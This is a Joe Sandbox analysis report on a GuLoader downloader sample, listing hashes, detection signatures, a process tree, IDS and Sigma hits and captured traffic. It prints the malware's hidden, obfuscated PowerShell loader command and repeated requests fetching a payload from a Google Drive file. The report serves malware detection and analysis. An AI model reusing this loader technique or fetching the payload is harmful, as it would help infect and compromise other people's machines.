Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
beNxougDFV.exe

Overview

General Information

Sample name:beNxougDFV.exe
renamed because original name is a hash value
Original sample name:3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f.exe
Analysis ID:1567517
MD5:8a678142d7d4bd32f67a17757cc896a0
SHA1:fa2ca787bbd87d95fba79851e1aba0000b9cfd8c
SHA256:3468b04eea8016136fe8dc5b259c22cf2088b3faa4b41f52f54ade1f0cb5078f
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • beNxougDFV.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\beNxougDFV.exe" MD5: 8A678142D7D4BD32F67A17757CC896A0)
    • powershell.exe (PID: 1352 cmdline: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7252 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    System Summary

    barindex
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49893
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", CommandLine: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\beNxougDFV.exe", ParentImage: C:\Users\user\Desktop\beNxougDFV.exe, ParentProcessId: 7728, ParentProcessName: beNxougDFV.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)", ProcessId: 1352, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-03T16:42:16.487474+010028032702Potentially Bad Traffic192.168.2.1049893172.217.19.174443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: beNxougDFV.exeAvira: detected
    Source: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exeAvira: detection malicious, Label: TR/AVI.Agent.ennqy
    Source: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exeReversingLabs: Detection: 50%
    Source: beNxougDFV.exeReversingLabs: Detection: 50%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: beNxougDFV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49893 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49902 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49908 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49923 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49930 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49937 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49952 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.10:49973 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.10:49977 version: TLS 1.2
    Source: beNxougDFV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_00406232 FindFirstFileA,FindClose,0_2_00406232
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004056F7
    Source: C:\Users\user\Desktop\beNxougDFV.exeCode function: 0_2_004026F8 FindFirstFileA,0_2_004026F8
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Users\user\Desktop\beNxougDFV.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49893 -> 172.217.19.174:443
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficHTTP traffic detected: GET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:18 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-TFpLPA0WypS0dwviuLEwkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7oyf3B5RRcR_my8haiXXmYfXG8_TpZwm3qMJpfW6YDlEmL3rvvM0n5ovD3NXSRxA5DD8ZyPEaZhAServer: UploadServerSet-Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa; expires=Wed, 04-Jun-2025 15:42:18 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-aIyapcr214F2SYZ0CBv6-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7yzxybbGQHdixWirF587o9euFwz36lAMnT78Aq46znOo8kWsbvdna8PbAxHrHqCKqzbQxoQ6ez5wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:42:30 GMTContent-Security-Policy: script-src 'nonce-gCDCwilFQJroLZxYcCAMiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7Lo2ZmvrRpsn4sG1lpRqNbmdjRbW5ywkF3oqofr8qj_A6U35OdeHsGOUJNNBbaOmH5vGBlPF9bNgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
